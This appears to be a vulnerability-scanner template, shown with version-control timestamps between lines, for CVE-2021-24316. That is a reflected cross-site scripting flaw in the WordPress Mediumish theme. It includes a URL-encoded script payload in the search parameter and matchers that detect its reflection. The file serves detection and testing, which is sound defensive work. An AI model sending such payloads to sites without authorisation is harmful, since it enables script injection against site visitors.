2021-06-04 09:28:45 +00:00
id : CVE-2021-24316
info :
2022-08-29 13:55:23 +00:00
name : WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting
2022-04-22 10:38:41 +00:00
author : 0x_Akoko
2021-06-04 09:28:45 +00:00
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
2022-05-17 09:18:12 +00:00
- https://www.wowthemes.net/themes/mediumish-wordpress/
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24316
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-24316
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,mediumish,xss,wordpress,wpscan
2021-06-04 09:28:45 +00:00
requests :
- method : GET
path :
2021-06-04 11:00:31 +00:00
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
2021-06-04 09:28:45 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2021-06-04 11:00:31 +00:00
- "<script>alert(/{{randstr}}/)</script>"
- "Sorry, no posts matched your criteria."
2021-06-04 09:28:45 +00:00
part : body
2021-06-04 11:00:31 +00:00
condition : and
2021-06-04 09:28:45 +00:00
- type : word
words :
- "text/html"
part : header
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28